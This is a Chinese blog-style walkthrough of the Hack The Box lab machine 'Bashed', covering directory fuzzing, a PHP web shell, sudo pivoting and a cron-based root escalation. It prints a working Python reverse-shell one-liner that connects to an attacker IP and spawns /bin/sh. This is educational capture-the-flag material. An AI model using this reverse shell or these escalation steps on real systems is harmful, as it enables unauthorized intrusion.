本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
一个每日分享渗透小技巧的公众号
大家好,这里是 大余安全 的第 121 篇文章,本公众号会每日分享攻防渗透技术给大家。
靶机地址:https://www.hackthebox.eu/home/machines/profile/118
靶机难度:初级(4.5/10)
靶机发布日期:2017 年 12 月 20 日
靶机描述:
Bashed is a fairly easy machine which focuses mainly on fuzzing and locating important files. As basic access to the crontab is restricted
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用 Kali Linux 作为解决该 HTB 的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的 IP 是 10.10.10.68....
发现只开放了 80 端口...
浏览 web 直接跳过....
直接爆破目录...
Dirbuster 发现了 dev 目录,其中包含 phpbash 脚本...
phpbash 是个反向外壳... 去看看
直接利用反向外壳,文件上传提权即可....
上传 php 简单 shell,获得了低权外壳....
通过低权外壳,获得了 user_flag 信息....
sudo -l 发现 all,无需任何密码可以直接 bash 到 scriptmanager 用户...
sudo -u 获得了 scriptmanager 用户权限....
枚举时发现 scripts 底层存在 test 文件脚本信息...
查看 test.py 文件信息,发现 test.py 每分钟执行一次,这可以通过阅读 test.py 并查看 test.txt 的时间戳来推断,该文本文件由 root 拥有,因为 root.txt 是 root 权限执行...
只需要修改 test.py 即可提权...
简单 python_shell...
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.51",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
等待一分钟后,自动提权 root.... 获得了 root_flag 信息...
由于我们已经成功得到 root 权限查看 user 和 root.txt,因此完成这台初级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~
随缘收徒中~~ 随缘收徒中~~ 随缘收徒中~~
欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!
大余安全
一个全栈渗透小技巧的公众号